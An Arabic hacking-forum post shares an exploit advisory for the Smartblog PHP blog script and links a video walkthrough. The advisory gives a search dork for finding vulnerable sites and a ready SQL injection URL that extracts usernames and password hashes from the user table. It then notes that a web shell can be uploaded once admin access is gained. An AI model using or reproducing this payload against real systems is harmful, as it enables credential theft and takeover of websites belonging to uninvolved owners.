سلام عليكم شباب اليوم حبيت احط لكم ثغرة من اكتشافي وكنت راح انزلها بالمواقع السيكيورتي
لكن في الميلورم قالو انها نازلة من قبل بس لو تدقق في الاولى وهي الثغرة الاصدار مختلف حتى في نوع المتغير المهم احنا مايهمنا نزولها من عدمو احنا نحب نستفيد ونتعلم لتقوية انفسنا
المهم الثغرة هي
كود PHP:
###################################################
[~] Smartblog remote SQL injection exploit
[~] download script : http://ftp1.toocharger.com/scfQ9NS/smartblog_3868.zip
[~] Founder: C0D3R-DZ { ALGERIAN HACKER }
[~] Greetz : his0k4,dr.jenin,seyfellah,hackdz & muslims HaCkErS...
[~] Contact: albatros7410[at]hotmail.fr
[~] Dork : Actionnée par smartblog
[~] P.O.C :
---------------------
http://localhost/[script_path]/index.php?id={SQL}
[~] Exemple :
http://localhost/[script_path]/?id=-2+union+select+1,2,concat(pseudo,0x3a,pass),4,5,6,7,8,9+from+smb_user/*
---------------------
[~] Note:
Admin http://localhost/[script_path]/?page=login.html
You can upload a shell from the admin panel
---------------------
ALGERIAN HACKER C0D3R-DZ
###############################################
وشرح من هنا شباب للتحميل
http://www.zshare.net/download/163263639d713d09/
الدرس مجاني مقابل الدعاء لي بانجاح بشهادة البكالوريا العام المقبل
مو مثل هاد العام رسبت في البكالوريا يالله شباب
تصبحو على خير اشوف الردود بكرى
الساعة وانا بكتب الموضوع00:30
الرئيسية
.
شركة
استضافة .
مركز
تحميل
.
الإسلام
.
مكتبة
الفيديو
.
المجموعة البريدية
.
خدمات
للمواقع
.
اتصل بنا
شرح ثغرة Actionnée par smartblog بالفيديو
العرض العادي
